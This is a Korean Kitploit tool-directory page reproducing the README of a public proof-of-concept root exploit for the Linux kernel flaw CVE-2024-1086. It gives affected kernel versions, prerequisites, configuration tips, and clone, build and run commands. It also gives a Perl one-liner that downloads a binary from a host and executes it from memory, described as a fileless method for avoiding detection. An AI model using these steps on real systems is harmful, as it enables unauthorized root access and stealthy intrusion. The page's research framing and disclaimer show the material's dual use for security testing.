Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2024-1086 — CVE-2024-1086에 대한 범용 로컬 권한 상승 PoC 익스플로잇으로, Debian, Ubuntu, KernelCTF를 포함한 v5.14~v6.6 사이의 대부분의 Linux 커널에서 작동합니다. KernelCTF 이미지에서 성공률은 99.4%입니다. | Kitploit
도구/GitHubGitHub/notselwyn/cve-2024-1086
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingPapers & ResearchLearning & EducationBinary Exploitation
GitHubnotselwyn/cve-2024-1086

CVE-2024-1086

CVE-2024-1086에 대한 범용 로컬 권한 상승 PoC 익스플로잇으로, Debian, Ubuntu, KernelCTF를 포함한 v5.14~v6.6 사이의 대부분의 Linux 커널에서 작동합니다. KernelCTF 이미지에서 성공률은 99.4%입니다.

저장소 보기
2.5k33032년 전Kitploit 검토 완료

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유
웹사이트

CVE-2024-1086

v5.14부터 v6.6 사이의 대부분의 Linux 커널(Debian, Ubuntu, KernelCTF 포함)에서 동작하는 CVE-2024-1086용 범용 로컬 권한 상승 PoC 익스플로잇입니다. KernelCTF 이미지에서 성공률은 99.4%입니다.

https://github.com/Notselwyn/CVE-2024-1086/assets/68616630/a3d43951-94ab-4c09-a14b-07b81f89b3de

블로그 포스트 / 라이트업

익스플로잇에 대한 전체 분석(write-up)은 배경 정보와 유용한 다이어그램을 포함하여 Flipping Pages 블로그 게시물에서 확인할 수 있습니다.

영향을 받는 버전

이 익스플로잇은 v5.14(포함)부터 v6.6(포함)까지의 버전에 영향을 미치며, 패치된 브랜치 v5.15.149>, v6.1.76>, v6.6.15>는 제외됩니다. 이러한 버전에 대한 패치는 2024년 2월에 릴리스되었습니다. 근본적인 취약점은 v3.15부터 v6.8-rc1까지의 모든 버전(패치된 안정 브랜치 제외)에 영향을 미칩니다.

주의사항:

  • 이 익스플로잇은 kconfig CONFIG_INIT_ON_ALLOC_DEFAULT_ON=y가 설정된 v6.4> 커널(Ubuntu v6.5 포함)에서는 동작하지 않습니다.
  • 이 익스플로잇은 사용자 네임스페이스(kconfig CONFIG_USER_NS=y)가 필요하며, 해당 사용자 네임스페이스가 비특권(unprivileged) 상태(sh 명령 sysctl kernel.unprivileged_userns_clone = 1)이고, nf_tables가 활성화되어 있어야 합니다(kconfig CONFIG_NF_TABLES=y). 기본적으로 Debian, Ubuntu, KernelCTF에서는 모두 활성화되어 있습니다. 다른 배포판은 테스트되지 않았지만 동작할 수도 있습니다. 또한 이 익스플로잇은 x64/amd64에서만 테스트되었습니다.
  • 이 익스플로잇은 네트워크 활동이 많은 시스템에서 매우 불안정할 수 있습니다.
    • WiFi 어댑터가 있는 시스템은 사용량이 많은 WiFi 네트워크에 둘러싸여 있으면 매우 불안정해집니다.
    • 테스트 장치에서는 BIOS를 통해 WiFi 어댑터를 꺼 주시기 바랍니다.
  • 익스플로잇 실행 후 발생하는 커널 패닉(시스템 크래시)은 의도적으로 수정하지 않은 부작용으로, 익스플로잇의 악의적인 사용을 방지하기 위한 것입니다(즉, 공격 시도가 더 눈에 띄게 되어 실제 환경에서는 비실용적이어야 합니다). 그럼에도 불구하고 루트 셸이 작동하고 디스크를 통한 지속성(persistence)이 가능하므로 실험실 환경에서 동작하는 개념 증명으로 사용할 수 있습니다.

사용법

설정

기본값은 로컬 셸이 있는 Debian, Ubuntu, KernelCTF에서 바로 동작합니다. 테스트되지 않은 환경/배포판에서는 kconfig 값이 대상 커널과 일치하는지 확인하십시오. 이러한 값은 src/config.h에서 지정할 수 있습니다. 물리 메모리가 32GiB를 초과하는 머신에서 익스플로잇을 실행하는 경우 CONFIG_PHYS_MEM을 늘리십시오. SSH(테스트 머신으로) 또는 리버스 셸을 통해 익스플로잇을 실행하는 경우 불필요한 네트워크 활동을 피하기 위해 CONFIG_REDIRECT_LOG를 1로 설정하는 것이 좋습니다.

빌드

이 방법이 번거롭다면 기본 설정으로 컴파일된 x64 바이너리가 있습니다.

root@kitploit:~
git clone https://github.com/Notselwyn/CVE-2024-1086
cd CVE-2024-1086
make

바이너리: CVE-2024-1086/exploit

실행

익스플로잇 실행도 마찬가지로 간단합니다:

root@kitploit:~
./exploit

탐지를 피해야 하는 침투 테스트 상황을 위해 파일리스(fileless) 실행도 지원됩니다. 단, 대상에 Perl이 설치되어 있어야 합니다:

root@kitploit:~
perl -e '
  require qw/syscall.ph/;

  my $fd = syscall(SYS_memfd_create(), $fn, 0);
  system "curl https://example.com/exploit -s >&$fd";
  exec {"/proc/$$/fd/$fd"} "memfd";
'

면책 조항

이 소프트웨어 디렉토리/폴더/저장소("리포지토리")에 포함된 프로그램 및 스크립트("프로그램")는 교육/연구 목적으로만 게시, 개발, 배포됩니다. 저("제작자")는 이 리포지토리의 프로그램에 대한 악의적이거나 불법적인 사용을 용납하지 않습니다. 이는 연구를 공유하려는 의도이지 불법 활동을 위한 것이 아니기 때문입니다. 이 리포지토리의 프로그램을 사용하여 여러분이 하는 모든 행위에 대해 저는 법적 책임이 없습니다.

도구 다운로드